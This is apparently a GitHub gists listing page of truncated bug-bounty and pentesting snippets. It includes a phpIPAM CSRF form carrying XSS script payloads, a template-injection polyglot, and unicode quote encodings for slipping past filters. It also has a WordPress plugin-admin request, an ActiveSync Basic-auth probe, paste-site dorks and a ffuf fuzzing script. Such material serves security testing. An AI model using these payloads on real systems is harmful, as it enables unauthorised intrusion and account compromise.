POST /wp-admin/admin.php?page=hugeit_slider HTTP/1.1
Host: localhost:8000
Content-Length: 53
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8000
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import sys | |
import base64 | |
''' | |
Small script to generate base64 passwords like, YWRtaW46YWRtaW4= | |
usage |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
${{<%[%'"}}%\.vult00 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from shutil import ExecError | |
import requests | |
from bs4 import BeautifulSoup | |
import os | |
import wget | |
from concurrent.futures import ThreadPoolExecutor | |
import zipfile | |
def wordpress_plugin(): | |
urls = [] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<body> | |
<h1> Exploit PHPIPAM </h1> | |
<p><strong> By: Incogbyte </strong></p> | |
<script>history.pushState('', '', '/')</script> | |
<form action="http://127.0.0.1:8082/app/admin/subnets/find_free_section_subnets.php" method="POST"> | |
<input type="hidden" name="container" value="body" /> | |
<input type="hidden" name="placement" value="top" /> | |
<input type="hidden" name="sectionid" value="2'><input onpointerleave="alert(1)">incogbyte</input><script>alert('incogbyte')</script>" /> | |
<input type="hidden" name="original-title" value="Search for free subnets in section " /> |
OPTIONS /Microsoft.Server-ActiveSync
Host: outlook.office365.com
Connection: Close
MS-ASProtocol: 14.0
Content-Length: 0
Authorization: Basic usermail:pass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"site:ideone.com | site:codebeautify.org | site:codeshare.io | site:codepen.io | site:repl.it | site:justpaste.it | site:pastebin.com | site:jsfiddle.net | site:trello.com | site:.attlasian.net "target" " |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
#tomnomnom juicy files https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51 | |
# ffuf tool https://github.com/ffuf/ffuf | |
# put the ffuf bin at /usr/local/bin and give the juicy.sh permission to execute with chmod +x juicy.sh and copy to | |
# /usr/local/bin too.. after that.. execute juicy.sh at any terminal. | |
# usage bash juicy.sh filename.txt | |
filename="$1" | |
while read -r line; do | |
name="$line" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Burp Suite > Proxy > Options > TLS Pass Through. | |
Add these: | |
*.google\.com | |
.*.gstatic).com | |
*.mozilla\.com | |
.*\.googleapis\.com | |
*.pkil.goog |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#### unicodes - single quote | |
%u0027 | |
%u02b9 | |
%u02bc | |
%u02c8 | |
%c0%27 | |
%c0%a | |
%e0%80%a7 |
OlderNewer